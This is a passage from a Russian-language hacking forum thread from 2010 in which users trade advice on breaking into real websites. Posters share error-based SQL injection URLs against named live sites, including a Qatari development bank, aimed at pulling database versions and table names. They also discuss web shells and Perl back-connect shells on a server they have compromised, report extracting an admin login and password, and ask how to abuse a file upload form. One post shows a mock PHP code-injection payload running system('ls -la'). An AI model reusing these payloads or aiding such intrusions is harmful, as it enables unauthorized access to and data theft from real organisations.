 |
|
04.04.2010, 21:00
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами:
9567396
Репутация:
23
|
|
проблема скорее всего именно в нехватке прав
Так через perl test.pl все работает, так что, думаю, не в правах дело.
попробуй найти что-нибудь кроме /var/www/cgi-bin
Нет, нету. Да и каталог-то, в который я могу писАть, всего один.
|
|
|
04.04.2010, 21:04
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
http://ashtarakkat.com/en/products/showProduct/63/
и зделаю так..
http://ashtarakkat.com/en/products/showProduct/63%27
скаjите поjaлуста ето sql ??
и как зделать ??
|
|
|
|
04.04.2010, 21:05
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от Nek1t
Так через perl test.pl все работает, так что, думаю, не в правах дело.
Нет, нету. Да и каталог-то, в который я могу писАть, всего один.
не путай perl test.pl и запуск perl-скрипта из веба, абсолютно разные вещи.
PS: perl test.pl будет работать в любых .*nix, если админ не изврашенец
|
|
|
|
04.04.2010, 21:10
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами:
9364549
Репутация:
184
|
|
Сообщение от Nek1t
Так через perl test.pl все работает, так что, думаю, не в правах дело.
Нет, нету. Да и каталог-то, в который я могу писАть, всего один.
А зачем тебе вообще перловый вебшелл? Не хватит обычного перлового бекконнекта, а затем уже ручками полазить/посмотреть?
|
|
|
|
04.04.2010, 21:21
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами:
9567396
Репутация:
23
|
|
ручками полазить/посмотреть
Ручками я и сейчас могу через passthru(), но на это уйдет много времени. ls, cat и т.д. - это, конечно, гибко, но не удобно.
|
|
|
|
04.04.2010, 22:49
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Подскажите можно ли здесь подобрать:
http://www.qatardevbank.com/ar/viewsubs.php?id=-2+order+by+5+--+
http://www.qatardevbank.com/ar/viewsubs.php?id=(select+1+from+(select+count(0),co ncat((select+version()),floor(rand(0)*2))+from+(se lect+1+union+select+2+union+select+3+union+select+ 3+union+select+3+union+select+3+union+select+3+uni on+select+3+union+select+3+union+select+3+union+se lect+3+union+select+3+union+select+3)x+group+by+2+ limit+1)a)+--+
http://www.qatardevbank.com/ar/viewsubs.php?id=-2+and+(select*from(select+count(*)from(select+1+un ion+select+2+union+select+3)x+group+by+concat(mid( (select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+ limit+1,1),1,64),floor(rand(0)*2)))z)+--+
|
|
|
|
04.04.2010, 23:03
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от FlaktW
Подскажите можно ли здесь подобрать:
http://www.qatardevbank.com/ar/viewsubs.php?id=-2+order+by+5+--+
http://www.qatardevbank.com/ar/viewsubs.php?id=(select+1+from+(select+count(0),co ncat((select+version()),floor(rand(0)*2))+from+(se lect+1+union+select+2+union+select+3+union+select+ 3+union+select+3+union+select+3+union+select+3+uni on+select+3+union+select+3+union+select+3+union+se lect+3+union+select+3+union+select+3)x+group+by+2+ limit+1)a)+--+
http://www.qatardevbank.com/ar/viewsubs.php?id=-2+and+(select*from(select+count(*)from(select+1+un ion+select+2+union+select+3)x+group+by+concat(mid( (select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+ limit+1,1),1,64),floor(rand(0)*2)))z)+--+
Код:
http://www.qatardevbank.com/ar/viewsubs.php?id=-2+or+1=1+and+substring(version(),1,1)=4
для начала
|
|
|
|
04.04.2010, 23:32
|
|
Новичок
Регистрация: 09.03.2010
Сообщений: 17
С нами:
8513472
Репутация:
0
|
|
Сообщение от Jokester
ZeroCold
Если mc=on, то шелл через скуль не залить(кроме отдельных часных случаев), запрос на вывод passwd у тебя правильный, если столбец принтабельный, а ничего не выводится, значит скорее всего нет прав
По поводу загрузки файлов. Вариантов очень много, всё зависит от кода, но может получится и так, что обойти его не получится совсем
Да кавычки фунициклируют, ну да столбец принтабельный таким методом выудил пас и лог от админки, правда по очереди, т.е. в два запроса каждый раз обрашаясь только к первому столбцу за один запрос неполучалось, скуль 4.18, покрайней мере так н мап сказал, другим способом не узнавалось.
Что касается загрузчика то даже не представляю как он выглядит, в смысле его код, на всей странице есть только ява
Код:
<!-- 3function MM_jumpMenu(targ,selObj,restore){ //v3.0 4 eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'"); 5 if (restore) selObj.selectedIndex=0; 6} 7//-->
но что то мне подсказывает отношения к загрузке это не имеет. 
Что касается самой конопки загрузки то фаер баг очень скупо о ней отзываеться
Код:
<input type="file" name="img_mini">
- об окне ввода пути откуда загружать
Код:
<input type="submit" value="Вставить файлы" id="files" name="files">
- собственно кнопка заливки. Есть идеи как это можно проэксплуатировать? )
|
|
|
|
05.04.2010, 00:13
|
|
Познающий
Регистрация: 30.03.2008
Сообщений: 64
С нами:
9534042
Репутация:
15
|
|
Сообщение от Jokester
Да, ребяты, даже не знаю что и сказать 
Тоесть вот так вот просто, выходим за скобки и кавычки, и выполняем php код, да?
Круто!!! Получается да. Проверил на локалке все работает
Сообщение от Jokester
А что тогда скромничать и mysql_query , выполняй уж что-то посерьёзнее =\
А чего тогда скуль раскручивать в гет запросах, хеши какие-то пытаться вытягивать? Не... я просто новичек, может опять чего-то не понимаю
Сообщение от Jokester
Инновации хек индустрии
Это цветочки... Уже есть идеи как магик.квотес обходить.
|
|
|
|
05.04.2010, 00:39
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от GivioN
Проверил на локалке все работает
А, ну тогда нормально, ты хакер
Сообщение от GivioN
Это цветочки... Уже есть идеи как магик.квотес обходить.
Да не запаривайся ты. Раз у тебя на локалке работает то, что ты показывал, ломай интырнеты!
Ну сам подумай, вот допустим код:
PHP код:
$id = $_GET['id'];
echo "$id";
А ты его вот так :
test.php?id=1']; system('ls -la'); // пыщ-пыщ!111
Если тот пример работает, то почему-бы этому не сработать?
Grey: даже особые обстоятельства Пашкелы не сравнятся с новым методом ^_^
Последний раз редактировалось Grey; 05.04.2010 в 01:22..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
